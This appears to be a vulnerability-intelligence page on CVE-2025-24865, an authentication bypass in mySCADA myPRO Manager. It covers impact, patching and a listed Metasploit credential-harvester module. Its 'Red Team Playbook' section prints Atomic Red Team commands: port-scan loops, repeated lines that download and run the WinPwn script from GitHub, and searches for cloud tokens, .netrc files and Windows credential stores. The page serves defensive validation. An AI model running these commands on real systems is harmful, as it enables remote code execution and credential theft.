CVE-2025-24865
Overview
This vulnerability is an authentication bypass affecting the administrative web interface of mySCADA myPRO Manager. The root cause is the absence of authentication controls on the management interface, allowing unrestricted access. The affected component is the web-based administrative interface responsible for system configuration and file management.
Vulnerability Description
The administrative web interface of mySCADA myPRO Manager can be accessed without authentication which could allow an unauthorized attacker to retrieve sensitive information and upload files without the associated password.
Impact
An attacker with network access can exploit this vulnerability to access the administrative interface without authentication, enabling unauthorized retrieval of sensitive data and arbitrary file uploads. This can lead to full compromise of the management system, including potential service disruption or further network infiltration. The exploit requires no user interaction or credentials (AV:N/AC:L/PR:N/UI:N) and affects confidentiality, integrity, and availability (C:H/I:H/A:H).
Solution
According to the advisory published by CISA (ICSA-25-044-16) and vendor documentation at mySCADA.org, users must apply the latest mySCADA myPRO Manager update that enforces authentication on the administrative web interface. Specific patch versions are detailed in the vendor's download section. Additionally, restricting network access to the management interface via firewall rules is recommended as a temporary mitigation until the update is applied.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the administrative web interface of mySCADA myPRO Manager presents a critical security flaw that allows unauthorized access without authentication. This weakness arises from improper access controls, enabling attackers to interact with the system as if they were legitimate users. By bypassing authentication mechanisms, an attacker can retrieve sensitive information stored within the system, such as configuration settings, user data, and operational parameters. Furthermore, the lack of authentication allows for file uploads, which could lead to the introduction of malicious files or scripts into the environment, potentially compromising the integrity of the system and its data.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An adversary could leverage automated tools to scan for exposed administrative interfaces, targeting systems that utilize mySCADA myPRO Manager. Once access is gained, the attacker can execute a variety of malicious actions, including data exfiltration and the injection of harmful payloads. Scenarios may include the unauthorized alteration of system configurations, leading to operational disruptions, or the deployment of ransomware that encrypts critical files, demanding payment for their release. The potential for such exploitation is exacerbated in environments where the system is connected to other critical infrastructure, such as industrial control systems, making it a prime target for cybercriminals.
The real-world impact of this vulnerability can be profound, particularly for organizations relying on mySCADA myPRO Manager for operational management. The exposure of sensitive information can lead to severe reputational damage, regulatory penalties, and financial losses. For instance, if an attacker were to access proprietary operational data or customer information, it could result in significant legal ramifications and loss of customer trust. Additionally, the ability to upload files without authentication could facilitate further attacks on interconnected systems, potentially leading to widespread disruptions in service and operational capabilities. The business risk associated with this vulnerability is heightened in sectors such as manufacturing, energy, and utilities, where operational continuity is paramount.
To detect and mitigate this vulnerability, organizations must implement a multi-faceted approach. Regular security assessments, including vulnerability scanning and penetration testing, should be conducted to identify and remediate any unauthorized access points. Employing web application firewalls can help filter out malicious traffic and block unauthorized access attempts. Additionally, organizations should enforce strict access controls and authentication mechanisms, ensuring that only authorized personnel can access the administrative interface. Implementing logging and monitoring solutions will also aid in detecting suspicious activities, allowing for timely incident response. Furthermore, organizations should stay informed about security updates and patches released by mySCADA to address known vulnerabilities promptly.
In conclusion, the vulnerability within the mySCADA myPRO Manager's administrative web interface poses a significant threat to organizations that utilize this product. The potential for unauthorized access without authentication can lead to severe consequences, including data breaches and operational disruptions. By understanding the technical details of the vulnerability, recognizing the various attack vectors, assessing the real-world impact, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this critical security risk. Proactive measures and a commitment to cybersecurity best practices are essential in safeguarding sensitive information and maintaining operational integrity in an increasingly complex threat landscape.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Myscada | Mypro | All |
cpe:2.3:a:myscada:mypro:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)
auxiliary/admin/scada/mypro_mgr_creds
|
Michael Heinzl | Unknown | - | View |
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-24865 |
| cisa.gov |
GitHub CVE
|
https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16 |
| myscada.org |
GitHub CVE
|
https://www.myscada.org/downloads/mySCADAPROManager/ |
| myscada.org |
GitHub CVE
|
https://www.myscada.org/contacts/ |